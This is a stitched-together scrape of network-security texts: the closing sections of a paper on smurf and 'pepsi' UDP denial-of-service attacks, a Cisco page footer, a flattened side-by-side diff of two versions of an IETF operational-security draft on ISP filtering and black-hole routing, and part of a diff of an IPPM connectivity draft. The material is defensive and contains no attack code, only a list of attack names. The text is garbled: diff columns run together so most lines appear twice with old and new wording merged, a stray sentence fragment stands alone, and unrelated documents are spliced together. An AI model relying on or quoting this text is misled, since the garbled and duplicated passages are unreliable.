The most common form of UDP flooding directed at harming networks is an attack consisting of a large number of spoofed UDP packets aimed at diagnostic ports on network devices. This attack is also known as the "pepsi" attack (again named after the exploit program), and can cause network devices to use up a large amount of CPU time responding to these packets.

To get more information on minimizing the effects of these two attacks, see:

Defining Strategies to Protect Against TCP SYN Denial of Service Attacks
http://cio.cisco.com/warp/public/707/4.html

Defining Strategies to Protect Against UDP Diagnostic Port DoS Attacks
http://cio.cisco.com/warp/public/707/3.html

9. PERFORMANCE INFORMATION:

One ISP has reported that, spread across three routers (2 RSP2 and 1 RSP4), the fast drop code eliminated a sustained 120 Mbps smurf attack and kept the network running without performance problems.

As always, your mileage may vary.

10. ACKNOWLEDGEMENTS:

Thanks to all those who helped review and provide input to the paper, as well as sanity checking.

11. REFERENCES:

RFC-1122, "Requirements for Internet Hosts - Communication Layers"; R.T. Braden; October 1989.

RFC-1812, "Requirements for IP Version 4 Routers"; F. Baker; June 1995.

RFC-2267, "Network Ingress Filtering: Defeating Denial of Service Attacks which employ IP Source Address Spoofing"; P. Ferguson, D. Senie; January 1998.

RFC-2644, "Changing the Default for Directed Broadcasts in Routers"; D. Senie; August 1999.

Defining Strategies to Protect Against TCP SYN Denial of Service Attacks
http://cio.cisco.com/warp/public/707/4.html

Defining Strategies to Protect Against UDP Diagnostic Port DoS Attacks
http://cio.cisco.com/warp/public/707/3.html

Cisco command documention to turn off directed broadcasts http://www.cisco.com/univercd/cc/td/doc/product/software/ios113ed/cs/csprtn1/csipadr.htm#xtocid748113

3Com command documentation to turn off directed broadcasts http://infodeli.3com.com/infodeli/tools/bridrout/u_guides/html/nb101/family/REF/ip4.htm#190

3Com command documentation to disable source spoofing http://infodeli.3com.com/infodeli/tools/bridrout/u_guides/html/nb101/family/REF/firewal3.htm#1823

12. PERMISSION TO DUPLICATE:

Permission to duplicate this information is granted under these terms:

1. My name and e-mail address remains on the information as a target for questions and identification of the source
2. My disclaimer appears on the information at the bottom
3. Feel free to add extra information from other discussions, etc., but please ensure the correct attribution is made to the author. Also provide Craig Huegen (chuegen@pentics.com) a copy of your additions.
4. Please help disseminate this information to other network administrators who are affected by these attacks.

If you have questions, I will be happy to answer them to the best of my knowledge.

13. MY DISCLAIMER:

I'm speaking about this as an interested party only. All text in this paper was written by me; I speak/write for no one but myself. No vendors have officially confirmed/denied any of the information contained herein. All research for this paper is being done purely as a matter of self-interest and desire to help others minimize effects of this attack.

Craig A. Huegen
chuegen@pentics.com
http://www.pentics.net/denial-of-service/

no service finger and no ip bootp server, respectively.
NetPro Discussion Forums ? Featured Conversations
Networking Professionals Connection is a forum for networking professionals to share questions, suggestions,
and information about networking solutions, products, and technologies. The featured links are some of the
most recent conversations available in this technology.
NetPro Discussion Forums ? Featured Conversations for Security
Security: Intrusion Detection [Systems]
Security: AAA
Security: General
Security: Firewalling
Related Information
· Cisco IOS Software
· Technical Support ? Cisco Systems
All contents are Copyright © 1992?2006 Cisco Systems, Inc. All rights reserved. Important Notices and Privacy Statement.
Updated: Feb 15, 2006 Document ID: 13367
Cisco ? Defining Strategies to Protect Against UDP Diagnostic Port Denial?of?Service Attacks

draft-ietf-opsec-current-practices-04.txt draft-ietf-opsec-current-practices-05.txt

OPSEC M. Kaeo OPSEC M. Kaeo
Internet-Draft Double Shot Security, Inc. Internet-Draft Double Shot Security, Inc.
Expires: December 27, 2006 June 25, 2006 Expires: January 6, 2007 July 5, 2006

Operational Security Current Practices Operational Security Current Practices
draft-ietf-opsec-current-practices-04 draft-ietf-opsec-current-practices-05

Status of this Memo Status of this Memo

By submitting this Internet-Draft, each author represents that any By submitting this Internet-Draft, each author represents that any
applicable patent or other IPR claims of which he or she is aware applicable patent or other IPR claims of which he or she is aware
have been or will be disclosed, and any of which he or she becomes have been or will be disclosed, and any of which he or she becomes
aware will be disclosed, in accordance with Section 6 of BCP 79. aware will be disclosed, in accordance with Section 6 of BCP 79.

Internet-Drafts are working documents of the Internet Engineering Internet-Drafts are working documents of the Internet Engineering
Task Force (IETF), its areas, and its working groups. Note that Task Force (IETF), its areas, and its working groups. Note that

skipping to change at page 1, line 33 skipping to change at page 1, line 33
and may be updated, replaced, or obsoleted by other documents at any and may be updated, replaced, or obsoleted by other documents at any
time. It is inappropriate to use Internet-Drafts as reference time. It is inappropriate to use Internet-Drafts as reference
material or to cite them other than as "work in progress." material or to cite them other than as "work in progress."

The list of current Internet-Drafts can be accessed at The list of current Internet-Drafts can be accessed at
http://www.ietf.org/ietf/1id-abstracts.txt. http://www.ietf.org/ietf/1id-abstracts.txt.

The list of Internet-Draft Shadow Directories can be accessed at The list of Internet-Draft Shadow Directories can be accessed at
http://www.ietf.org/shadow.html. http://www.ietf.org/shadow.html.

This Internet-Draft will expire on December 27, 2006. This Internet-Draft will expire on January 6, 2007.

Copyright Notice Copyright Notice

Copyright (C) The Internet Society (2006). Copyright (C) The Internet Society (2006).

Abstract Abstract

This document is a survey of the current practices used in today's This document is a survey of the current practices used in today's
large ISP operational networks to secure layer 2 and layer 3 large ISP operational networks to secure layer 2 and layer 3
infrastructure devices. The information listed here is the result of infrastructure devices. The information listed here is the result of

skipping to change at page 2, line 21 skipping to change at page 2, line 21
1.4. Operational Security Impact from Threats . . . . . . . . . 5 1.4. Operational Security Impact from Threats . . . . . . . . . 5
1.5. Document Layout . . . . . . . . . . . . . . . . . . . . . 7 1.5. Document Layout . . . . . . . . . . . . . . . . . . . . . 7
1.6. Definitions . . . . . . . . . . . . . . . . . . . . . . . 8 1.6. Definitions . . . . . . . . . . . . . . . . . . . . . . . 8
2. Protected Operational Functions . . . . . . . . . . . . . . . 9 2. Protected Operational Functions . . . . . . . . . . . . . . . 9
2.1. Device Physical Access . . . . . . . . . . . . . . . . . . 9 2.1. Device Physical Access . . . . . . . . . . . . . . . . . . 9
2.2. Device In-Band Management . . . . . . . . . . . . . . . . 11 2.2. Device In-Band Management . . . . . . . . . . . . . . . . 11
2.3. Device Out-of-Band Management . . . . . . . . . . . . . . 15 2.3. Device Out-of-Band Management . . . . . . . . . . . . . . 15
2.4. Data Path . . . . . . . . . . . . . . . . . . . . . . . . 20 2.4. Data Path . . . . . . . . . . . . . . . . . . . . . . . . 20
2.5. Routing Control Plane . . . . . . . . . . . . . . . . . . 22 2.5. Routing Control Plane . . . . . . . . . . . . . . . . . . 22
2.6. Software Upgrades and Configuration Integrity / 2.6. Software Upgrades and Configuration Integrity /
Validation . . . . . . . . . . . . . . . . . . . . . . . . 25 Validation . . . . . . . . . . . . . . . . . . . . . . . . 26
2.7. Logging Considerations . . . . . . . . . . . . . . . . . . 29 2.7. Logging Considerations . . . . . . . . . . . . . . . . . . 29
2.8. Filtering Considerations . . . . . . . . . . . . . . . . . 32 2.8. Filtering Considerations . . . . . . . . . . . . . . . . . 32
2.9. Denial of Service Tracking / Tracing . . . . . . . . . . . 33 2.9. Denial of Service Tracking / Tracing . . . . . . . . . . . 33
3. Security Considerations . . . . . . . . . . . . . . . . . . . 35 3. Security Considerations . . . . . . . . . . . . . . . . . . . 35
4. Normative References . . . . . . . . . . . . . . . . . . . . . 35 4. References . . . . . . . . . . . . . . . . . . . . . . . . . . 36
Appendix A. Acknowledgments . . . . . . . . . . . . . . . . . . . 36 4.1. Normative References . . . . . . . . . . . . . . . . . . . 36
Appendix B. Protocol Specific Attacks . . . . . . . . . . . . . . 37 4.2. Informational References . . . . . . . . . . . . . . . . . 36
B.1. Layer 2 Attacks . . . . . . . . . . . . . . . . . . . . . 37 Appendix A. Acknowledgments . . . . . . . . . . . . . . . . . . . 37
B.2. IPv4 Attacks . . . . . . . . . . . . . . . . . . . . . . . 37 Appendix B. Protocol Specific Attacks . . . . . . . . . . . . . . 38
B.3. IPv6 Attacks . . . . . . . . . . . . . . . . . . . . . . . 38 B.1. Layer 2 Attacks . . . . . . . . . . . . . . . . . . . . . 38
Author's Address . . . . . . . . . . . . . . . . . . . . . . . . . 39 B.2. IPv4 Attacks . . . . . . . . . . . . . . . . . . . . . . . 38
Intellectual Property and Copyright Statements . . . . . . . . . . 40 B.3. IPv6 Attacks . . . . . . . . . . . . . . . . . . . . . . . 39
Author's Address . . . . . . . . . . . . . . . . . . . . . . . . . 41
Intellectual Property and Copyright Statements . . . . . . . . . . 42

1. Introduction 1. Introduction

Security practices are well understood by the network operators who Security practices are well understood by the network operators who
have for many years gone through the growing pains of securing their have for many years gone through the growing pains of securing their
network infrastructures. However, there does not exist a written network infrastructures. However, there does not exist a written
document that enumerates these security practices. Network attacks document that enumerates these security practices. Network attacks
are continually increasing and although it is not necessarily the are continually increasing and although it is not necessarily the
role of an ISP to act as the Internet police, each ISP has to ensure role of an ISP to act as the Internet police, each ISP has to ensure
that certain security practices are followed to ensure that their that certain security practices are followed to ensure that their

skipping to change at page 20, line 50 skipping to change at page 20, line 50
2.4.2. Security Practices 2.4.2. Security Practices

Filtering and rate limiting are the primary mechanism to provide risk Filtering and rate limiting are the primary mechanism to provide risk
mitigation of malicious traffic rendering the ISP services mitigation of malicious traffic rendering the ISP services
unavailable. However, filtering and rate limiting of data path unavailable. However, filtering and rate limiting of data path
traffic is deployed in a variety of ways depending on how automated traffic is deployed in a variety of ways depending on how automated
the process is and what the capabilities and performance limitations the process is and what the capabilities and performance limitations
of existing deployed hardware are. of existing deployed hardware are.

The ISPs which do not have performance issues with their equipment The ISPs which do not have performance issues with their equipment
follow BCP38 [BCP38] and BCP84 [BCP84] guidelines. Null routes and follow BCP38 [RFC2827] and BCP84 [RFC3704] guidelines for ingress
black-hole triggered routing [BHTR] are used to deter any detected filtering. BCP38 recommends filtering ingress packets with obviously
malicious traffic streams. Most ISPs consider layer 4 filtering spoofed and/or 'reserved' source addresses to limit the effects of
useful but it is only implemented if performance limitations allow denial of service attacks while BCP84 extends the recommendation for
for it. Layer 4 filtering is typically only when no other option multi-homed environments. Null routes and black-hole triggered
exists since it does pose a large administrative overhead and ISPs routing are used to deter any detected malicious traffic streams.
are very much opposed to acting as the Internet firewall. Netflow is These techniques are described in more detail in section 2.9 below.
used for tracking traffic flows but there is some concern whether
sampling is good enough to detect malicious behavior. Most ISPs consider layer 4 filtering useful but it is only
implemented if performance limitations allow for it. Layer 4
filtering is typically only when no other option exists since it does
pose a large administrative overhead and ISPs are very much opposed
to acting as the Internet firewall. Netflow is used for tracking
traffic flows but there is some concern whether sampling is good
enough to detect malicious behavior.

Unicast RPF is not consistently implemented. Some ISPs are in Unicast RPF is not consistently implemented. Some ISPs are in
process of doing so while other ISPs think that the perceived benefit process of doing so while other ISPs think that the perceived benefit
of knowing that spoofed traffic comes from legitimate addresses are of knowing that spoofed traffic comes from legitimate addresses are
not worth the operational complexity. Some providers have a policy not worth the operational complexity. Some providers have a policy
of implementing uRPF at link speeds of DS3 and below. of implementing uRPF at link speeds of DS3 and below.

2.4.3. Security Services 2.4.3. Security Services

o User Authentication - Not applicable o User Authentication - Not applicable

skipping to change at page 24, line 14 skipping to change at page 24, line 19

2.5.7. Security Practices 2.5.7. Security Practices

Securing the routing control plane takes many features which are Securing the routing control plane takes many features which are
generally deployed as a system. MD5 authentication is used by some generally deployed as a system. MD5 authentication is used by some
ISPs to validate the sending peer and to ensure that the data in ISPs to validate the sending peer and to ensure that the data in
transit has not been altered. Some ISPs only deploy MD5 transit has not been altered. Some ISPs only deploy MD5
authentication at customer's request. Additional sanity checks to authentication at customer's request. Additional sanity checks to
ensure with reasonable certainty that the received routing update was ensure with reasonable certainty that the received routing update was
originated by a valid routing peer include route filters and the originated by a valid routing peer include route filters and the
Generalized TTL Security Mechanism (GTSM) feature [GTSM] (sometimes Generalized TTL Security Mechanism (GTSM) feature [RFC3682]
also referred to as the TTL-Hack). Note that validating whether a (sometimes also referred to as the TTL-Hack). Note that validating
legitimate peer has the authority to send the contents of the routing whether a legitimate peer has the authority to send the contents of
update is a difficult problem that needs yet to be resolved. the routing update is a difficult problem that needs yet to be
resolved.

In the case of BGP routing, a variety of policies are deployed to In the case of BGP routing, a variety of policies are deployed to
limit the propagation of invalid routing information. These include: limit the propagation of invalid routing information. These include:
incoming and outgoing prefix filters for BGP customers, incoming and incoming and outgoing prefix filters for BGP customers, incoming and
outgoing prefix filters for peers and upstream neighbors, incoming outgoing prefix filters for peers and upstream neighbors, incoming
AS-PATH filter for BGP customers, outgoing AS-PATH filter towards AS-PATH filter for BGP customers, outgoing AS-PATH filter towards
peers and upstream neighbors, route dampening and rejecting selected peers and upstream neighbors, route dampening and rejecting selected
attributes and communities. Consistency between these policies attributes and communities. Consistency between these policies
varies greatly although there is a trend to start depending on AS- varies greatly although there is a trend to start depending on AS-
PATH filters because they are much more manageable than the large PATH filters because they are much more manageable than the large

skipping to change at page 31, line 47 skipping to change at page 32, line 11
o Access Control - Filtering on logging host and server IP address o Access Control - Filtering on logging host and server IP address
to ensure that syslog information only goes to specific syslog to ensure that syslog information only goes to specific syslog
hosts. hosts.

o Data Integrity - Not implemented o Data Integrity - Not implemented

o Data Confidentiality - Not implemented o Data Confidentiality - Not implemented

o Auditing / Logging - This entire section deals with logging. o Auditing / Logging - This entire section deals with logging.

o DoS Mitigation - Logs are useful in providing traceback o DoS Mitigation - An OOB management system is used and sometimes
information to potentially trace the attack to as close to the different syslog servers are used for logging information from
source as possible. varying equipment. Exception logging tries to keep information to
a minimum.

2.7.4. Additional Considerations 2.7.4. Additional Considerations

There is no security with syslog and ISPs are fully cognizant of There is no security with syslog and ISPs are fully cognizant of
this. IPsec is considered too operationally expensive and cumbersome this. IPsec is considered too operationally expensive and cumbersome
to deploy. Syslog-ng and stunnel are being looked at for providing to deploy. Syslog-ng and stunnel are being looked at for providing
better authenticated and integrity protected solutions. Mechanisms better authenticated and integrity protected solutions. Mechanisms
to prevent unauthorized personnel from tampering with logs is to prevent unauthorized personnel from tampering with logs is
constrained to auditing who has access to the logging servers and constrained to auditing who has access to the logging servers and
files. files.

skipping to change at page 32, line 34 skipping to change at page 32, line 45
sections, this section will provide some more insights to the sections, this section will provide some more insights to the
filtering considerations that are currently being taken into account. filtering considerations that are currently being taken into account.
Filtering is now being categorized into three specific areas: data Filtering is now being categorized into three specific areas: data
plane, management plane and routing control plane. plane, management plane and routing control plane.

2.8.1. Data Plane Filtering 2.8.1. Data Plane Filtering

Data plane filters control the traffic that traverses through a Data plane filters control the traffic that traverses through a
device and affect transit traffic. Most ISPs deploy these kinds of device and affect transit traffic. Most ISPs deploy these kinds of
filters at the customer facing edge devices to mitigate spoofing filters at the customer facing edge devices to mitigate spoofing
attacks. attacks using BCP38 and BCP84 guidelines.

2.8.2. Management Plane Filtering 2.8.2. Management Plane Filtering

Management filters control the traffic to and from a device. All of Management filters control the traffic to and from a device. All of
the protocols which are used for device management fall under this the protocols which are used for device management fall under this
category and includes SSH, Telnet, SNMP, NTP, http, DNS, TFTP, FTP, category and includes SSH, Telnet, SNMP, NTP, HTTP, DNS, TFTP, FTP,
SCP and Syslog. This type of traffic is often filtered per interface SCP and Syslog. This type of traffic is often filtered per interface
and is based on any combination of protocol, source and destination and is based on any combination of protocol, source and destination
IP address and source and destination port number. Some devices IP address and source and destination port number. Some devices
support functionality to apply management filters to the device support functionality to apply management filters to the device
rather than to the specific interfaces (e.g. receive ACL or loopback rather than to the specific interfaces (e.g. receive ACL or loopback
interface ACL) which is gaining wider acceptance. Note that logging interface ACL) which is gaining wider acceptance. Note that logging
the filtering rules can today place a burden on many systems and more the filtering rules can today place a burden on many systems and more
granularity is often required to more specifically log the required granularity is often required to more specifically log the required
exceptions. exceptions.

Any services that are not specifically used are turned off.

IPv6 networks require the use of specific ICMP messages for proper IPv6 networks require the use of specific ICMP messages for proper
protocol operation. Therefore, ICMP cannot be completely filtered to protocol operation. Therefore, ICMP cannot be completely filtered to
and from a device. Instead, granular ICMPv6 filtering is always and from a device. Instead, granular ICMPv6 filtering is always
deployed to allow for specific ICMPv6 types to be sourced or destined deployed to allow for specific ICMPv6 types to be sourced or destined
to a network device. to a network device. A good guideline for IPv6 filtering is in the
draft work in progress on Best Current Practices for Filtering ICMPv6
Messages in Firewalls [I-D.ietf-v6ops-icmpv6-filtering-bcp].

2.8.3. Routing Control Plane Filtering 2.8.3. Routing Control Plane Filtering

Routing filters are used to control the flow of routing information. Routing filters are used to control the flow of routing information.
In IPv6 networks, some providers are liberal in accepting /48s due to In IPv6 networks, some providers are liberal in accepting /48s due to
the still unresolved multihoming issues. Any announcement received the still unresolved multihoming issues. Any announcement received
that is longer than a /48 for IPv6 routing and a /24 for IPv4 routing that is longer than a /48 for IPv6 routing and a /24 for IPv4 routing
is filtered out of eBGP. Note that this is for non-customer traffic. is filtered out of eBGP. Note that this is for non-customer traffic.
Most ISPs will accept any agreed upon prefix length from its Most ISPs will accept any agreed upon prefix length from its
customer(s). customer(s).

skipping to change at page 33, line 45 skipping to change at page 34, line 14

2.9.1. Sink Hole Routing 2.9.1. Sink Hole Routing

Sink hole routing refers to injecting a more specific route for any Sink hole routing refers to injecting a more specific route for any
known attack traffic which will ensure that the malicious traffic is known attack traffic which will ensure that the malicious traffic is
redirected to a valid device or specific system where it can be redirected to a valid device or specific system where it can be
analyzed. analyzed.

2.9.2. Black-Hole Triggered Routing 2.9.2. Black-Hole Triggered Routing

Black-hole triggered routing is a technique where the BGP routing Black-hole triggered routing (also referred to as Remote Triggered
protocol is used to propagate routes which in turn redirects attack Black Hole Filtering) is a technique where the BGP routing protocol
traffic to the null interface where it is effectively dropped. This is used to propagate routes which in turn redirects attack traffic to
technique is often used in large routing infrastructures since BGP the null interface where it is effectively dropped. This technique
can propagate the information in a fast effective manner as opposed is often used in large routing infrastructures since BGP can
to using any packet-based filtering techniques on hundreds or propagate the information in a fast effective manner as opposed to
thousands of routers. using any packet-based filtering techniques on hundreds or thousands
of routers. [refer to the following NANOG presentation for a more
complete description http://www.nanog.org/mtg-0402/pdf/morrow.pdf]

2.9.3. Unicast Reverse Path Forwarding 2.9.3. Unicast Reverse Path Forwarding

Unicast Reverse Path Forwarding (uRPF) is a mechanism for validating Unicast Reverse Path Forwarding (uRPF) is a mechanism for validating
whether an incoming packet has a legitimate source address or not. whether an incoming packet has a legitimate source address or not.
It has two modes: strict mode and loose mode. In strict mode, uRPF It has two modes: strict mode and loose mode. In strict mode, uRPF
checks whether the incoming packet has a source address that matches checks whether the incoming packet has a source address that matches
a prefix in the routing table, and whether the interface expects to a prefix in the routing table, and whether the interface expects to
receive a packet with this source address prefix. If the incoming receive a packet with this source address prefix. If the incoming
packet fails the unicast RPF check, the packet is not accepted on the packet fails the unicast RPF check, the packet is not accepted on the

skipping to change at page 35, line 8 skipping to change at page 35, line 8
SYN attack where a large number of resources get allocated for SYN attack where a large number of resources get allocated for
spoofed TCP traffic. Although this technique does not stop an spoofed TCP traffic. Although this technique does not stop an
attack, it can sometimes lessen the damage and impact on a specific attack, it can sometimes lessen the damage and impact on a specific
service. However, it can also make the impact of a DDoS attack much service. However, it can also make the impact of a DDoS attack much
worse if the rate limiting is impacting (i.e. discarding) more worse if the rate limiting is impacting (i.e. discarding) more
legitimate traffic. legitimate traffic.

3. Security Considerations 3. Security Considerations

This entire document deals with current security practices in large This entire document deals with current security practices in large
ISP environments. As a synopsis, a table is shown below which ISP environments. It lists specific practices used in today's
summarizes the operational functions which are to be protected and environments and as such does not in itself pose any security risk.
the security services which currently deployed security practices
offer: [ Table to be added ]

4. Normative References 4. References

4.1. Normative References

[RFC2119] Bradner, S., "Key words for use in RFCs to Indicate [RFC2119] Bradner, S., "Key words for use in RFCs to Indicate
Requirement Levels", BCP 14, RFC 2119, March 1997. Requirement Levels", BCP 14, RFC 2119, March 1997.

[RFC2827] Ferguson, P. and D. Senie, "Network Ingress Filtering:
Defeating Denial of Service Attacks which employ IP Source
Address Spoofing", BCP 38, RFC 2827, May 2000.

[RFC2828] Shirey, R., "Internet Security Glossary", RFC 2828, [RFC2828] Shirey, R., "Internet Security Glossary", RFC 2828,
May 2000. May 2000.

[RFC3552] Rescorla, E. and B. Korver, "Guidelines for Writing RFC [RFC3552] Rescorla, E. and B. Korver, "Guidelines for Writing RFC
Text on Security Considerations", BCP 72, RFC 3552, Text on Security Considerations", BCP 72, RFC 3552,
July 2003. July 2003.

[RFC3682] Gill, V., Heasley, J., and D. Meyer, "The Generalized TTL
Security Mechanism (GTSM)", RFC 3682, February 2004.

[RFC3704] Baker, F. and P. Savola, "Ingress Filtering for Multihomed
Networks", BCP 84, RFC 3704, March 2004.

4.2. Informational References

[I-D.ietf-v6ops-icmpv6-filtering-bcp]
Davies, E. and J. Mohacsi, "Best Current Practice for
Filtering ICMPv6 Messages in Firewalls",
draft-ietf-v6ops-icmpv6-filtering-bcp-01 (work in
progress), March 2006.

[I-D.lewis-infrastructure-security]
Lewis, D., "Service Provider Infrastructure Security",
draft-lewis-infrastructure-security-00 (work in progress),
June 2006.

[I-D.savola-bcp84-urpf-experiences]
Savola, P., "Experiences from Using Unicast RPF",
draft-savola-bcp84-urpf-experiences-01 (work in progress),
June 2006.

[I-D.savola-rtgwg-backbone-attacks]
Savola, P., "Backbone Infrastructure Attacks and
Protections", draft-savola-rtgwg-backbone-attacks-01 (work
in progress), June 2006.

Appendix A. Acknowledgments Appendix A. Acknowledgments

The editor gratefully acknowledges the contributions of: George The editor gratefully acknowledges the contributions of: George
Jones, who has been instrumental in providing guidance and direction Jones, who has been instrumental in providing guidance and direction
for this document and the insighful comments from Ross Callon, Ron for this document and the insighful comments from Ross Callon, Ron
Bonica, Gaurab Upadhaya, Warren Kumari and the numerous ISP operators Bonica, Gaurab Upadhaya, Warren Kumari and the numerous ISP operators
who supplied the information which is depicted in this document. who supplied the information which is depicted in this document.

Appendix B. Protocol Specific Attacks Appendix B. Protocol Specific Attacks

This section will enumerate many of the traditional protocol based This section will list many of the traditional protocol based attacks
attacks which have been observed over the years to cause malformed which have been observed over the years to cause malformed packets
packets and/or exploit protocol deficiencies. and/or exploit protocol deficiencies. Note that they all exploit
vulnerabilities in the actual protocol itself and often, additional
authentication and auditing mechanisms are now used to detect and
mitigate the impact of these attacks. The list is not exhaustive but
is a fraction of the representation of what types of attacks are
possible for varying protocols.

B.1. Layer 2 Attacks B.1. Layer 2 Attacks

o ARP Flooding o ARP Flooding

B.2. IPv4 Attacks B.2. IPv4 Attacks

o IP Stream Option o IP Stream Option

o IP Address Spoofing o IP Address Spoofing

o IP Source Route Option o IP Source Route Option

o IP Short header o IP Short header

o IP Malformed Packet o IP Malformed Packet

o Ip Bad Option o IP Bad Option

o Ip Address Session Limit o IP Address Session Limit

o Fragmenmts - too many o Fragments - too many

o Fragments - large offset o Fragments - large offset

o Fragments - same offset o Fragments - same offset

o Fragments - reassembly with different offsets (TearDrop Attac) o Fragments - reassembly with different offsets (TearDrop Attac)

o Fragments - reassembly off by one IP header (Nestea Attack) o Fragments - reassembly off by one IP header (Nestea Attack)

o Fragment - flooding only initial fragment (Rose Attack) o Fragment - flooding only initial fragment (Rose Attack)

skipping to change at page 38, line 34 skipping to change at page 39, line 40
o SYN Flood o SYN Flood

o SYN with IP Spoofing (Land Attack) o SYN with IP Spoofing (Land Attack)

o SYN and FIN bits set o SYN and FIN bits set

o TCP port scan attack o TCP port scan attack

o UDP spoofed broadcast echo (Fraggle Attack) o UDP spoofed broadcast echo (Fraggle Attack)

o UDP attack on diag ports (Pepsi Attack) o UDP attack on diagnostic ports (Pepsi Attack)

B.3. IPv6 Attacks B.3. IPv6 Attacks

Any of the above-mentioned IPv4 attacks could be used in IPv6 Any of the above-mentioned IPv4 attacks could be used in IPv6
networks with the exception of any fragmentation and broadcast networks with the exception of any fragmentation and broadcast
traffic, which operate differently in IPv6. traffic, which operate differently in IPv6. Note that all of these
attacks are based on either spoofing or misusing any part of the
protocol field(s).

Today, IPv6 enabled hosts are starting to be used to create IPv6 Today, IPv6 enabled hosts are starting to be used to create IPv6
tunnels which can effectively hide botnet and other malicious traffic tunnels which can effectively hide botnet and other malicious traffic
if firewalls and network flow collection tools are not capable of if firewalls and network flow collection tools are not capable of
detecting this traffic. detecting this traffic. The security measures used for protecting
IPv6 infrastructures should be the same as in IPv4 networks but with
additional considerations for IPv6 network operations which may be
different from IPv4.

Author's Address Author's Address

Merike Kaeo Merike Kaeo
Double Shot Security, Inc. Double Shot Security, Inc.
3518 Fremont Avenue North #363 3518 Fremont Avenue North #363
Seattle, WA 98103 Seattle, WA 98103
U.S.A. U.S.A.

Phone: +1 310 866 0165 Phone: +1 310 866 0165

draft-ietf-ippm-connectivity-03.txt draft-ietf-ippm-connectivity-04.txt

Network Working Group J. Mahdavi, Pittsburgh Supercomputer Center Network Working Group J. Mahdavi, Pittsburgh Supercomputer Center
Internet Draft V. Paxson, Lawrence Berkeley National Laboratory Internet Draft V. Paxson, Lawrence Berkeley National Laboratory
Expiration Date: April 1999 October 1998 Expiration Date: May 1999 November 1998

IPPM Metrics for Measuring Connectivity IPPM Metrics for Measuring Connectivity

1. Status of this Memo 1. Status of this Memo

This document is an Internet Draft. Internet Drafts are working This document is an Internet Draft. Internet Drafts are working
documents of the Internet Engineering Task Force (IETF), its areas, documents of the Internet Engineering Task Force (IETF), its areas,
and its working groups. Note that other groups may also distribute and its working groups. Note that other groups may also distribute
working documents as Internet Drafts. working documents as Internet Drafts.

Internet Drafts are draft documents valid for a maximum of six Internet Drafts are draft documents valid for a maximum of six
months, and may be updated, replaced, or obsoleted by other documents months, and may be updated, replaced, or obsoleted by other documents

skipping to change at page 2, line 5 skipping to change at page 2, line 5
define several such metrics, some of which serve mainly as building define several such metrics, some of which serve mainly as building
blocks for the others. blocks for the others.

This memo defines a series of metrics for connectivity between a pair This memo defines a series of metrics for connectivity between a pair
of Internet hosts. It builds on notions introduced and discussed in of Internet hosts. It builds on notions introduced and discussed in
RFC 2330, the IPPM framework document. The reader is assumed to be RFC 2330, the IPPM framework document. The reader is assumed to be
familiar with that document. familiar with that document.

The structure of the memo is as follows: The structure of the memo is as follows:

ID IPPM Metrics for Measuring Connectivity October 1998 ID IPPM Metrics for Measuring Connectivity November 1998

+ An analytic metric, called Type-P-Instantaneous-Unidirectional- + An analytic metric, called Type-P-Instantaneous-Unidirectional-
Connectivity, will be introduced to define one-way connectivity at Connectivity, will be introduced to define one-way connectivity at
one moment in time. one moment in time.
+ Using this metric, another analytic metric, called Type-P- + Using this metric, another analytic metric, called Type-P-
Instantaneous-Bidirectional-Connectivity, will be introduced to Instantaneous-Bidirectional-Connectivity, will be introduced to
define two-way connectivity at one moment in time. define two-way connectivity at one moment in time.
+ Using these metrics, corresponding one- and two-way analytic + Using these metrics, corresponding one- and two-way analytic
metrics are defined for connectivity over an interval of time. metrics are defined for connectivity over an interval of time.
+ Using these metrics, an analytic metric, called Type-P1-P2- + Using these metrics, an analytic metric, called Type-P1-P2-

skipping to change at page 3, line 5 skipping to change at page 3, line 5
3.3. Metric Units: 3.3. Metric Units:

Boolean. Boolean.

3.4. Definition: 3.4. Definition:

Src has *Type-P-Instantaneous-Unidirectional-Connectivity* to Dst at Src has *Type-P-Instantaneous-Unidirectional-Connectivity* to Dst at
time T if a type-P packet transmitted from Src to Dst at time T will time T if a type-P packet transmitted from Src to Dst at time T will
arrive at Dst. arrive at Dst.

ID IPPM Metrics for Measuring Connectivity October 1998 ID IPPM Metrics for Measuring Connectivity November 1998

3.5. Discussion: 3.5. Discussion:

For most applications (e.g., any TCP connection) bidirectional For most applications (e.g., any TCP connection) bidirectional
connectivity is considerably more germane than unidirectional connectivity is considerably more germane than unidirectional
connectivity, although unidirectional connectivity can be of interest connectivity, although unidirectional connectivity can be of interest
for some security applications (e.g., testing whether a firewall for some security applications (e.g., testing whether a firewall
correctly filters out a "ping of death"). Most applications also correctly filters out a "ping of death"). Most applications also
require connectivity over an interval, while this metric is require connectivity over an interval, while this metric is
instantaneous, though, again, for some security applications instantaneous, though, again, for some security applications

skipping to change at page 4, line 5 skipping to change at page 4, line 5
the unidirectional connectivity defined in this metric. the unidirectional connectivity defined in this metric.

4. Instantaneous Two-way Connectivity 4. Instantaneous Two-way Connectivity

4.1. Metric Name: 4.1. Metric Name:

Type-P-Instantaneous-Bidirectional-Connectivity Type-P-Instantaneous-Bidirectional-Connectivity

4.2. Metric Parameters: 4.2. Metric Parameters:

ID IPPM Metrics for Measuring Connectivity October 1998 ID IPPM Metrics for Measuring Connectivity November 1998

+ A1, the IP address of a host + A1, the IP address of a host
+ A2, the IP address of a host + A2, the IP address of a host
+ T, a time + T, a time

4.3. Metric Units: 4.3. Metric Units:

Boolean. Boolean.

4.4. Definition: 4.4. Definition:

Addresses A1 and A2 have *Type-P-Instantaneous-Bidirectional- Addresses A1 and A2 have *Type-P-Instantaneous-Bidirectional-
Connectivity* at time T if address A1 has Type-P-Instantaneous- Connectivity* at time T if address A1 has Type-P-Instantaneous-
Unidirectional-Connectivity to address A2 and address A2 has Type-P- Unidirectional-Connectivity to address A2 and address A2 has Type-P-
Instantaneous-Unidirectional-Connectivity to address A1. Instantaneous-Unidirectional-Connectivity to address A1.

4.5. Discussion: 4.5. Discussion:

An alternative definition would be that at A1 and A2 are fully An alternative definition would be that A1 and A2 are fully connected
connected if at time T address A1 has instantaneous connectivity to if at time T address A1 has instantaneous connectivity to address A2,
address A2, and at time T+dT address A2 has instantaneous and at time T+dT address A2 has instantaneous connectivity to A1,
connectivity to A1, where T+dT is when the packet sent from A1 where T+dT is when the packet sent from A1 arrives at A2. This
arrives at A2. This definition is more useful for measurement, definition is more useful for measurement, because the measurement
because the measurement can use a reply from A2 to A1 in order to can use a reply from A2 to A1 in order to assess full connectivity.
assess full connectivity. It is a more complex definition, however, It is a more complex definition, however, because it breaks the
because it breaks the symmetry between A1 and A2, and requires a symmetry between A1 and A2, and requires a notion of quantifying how
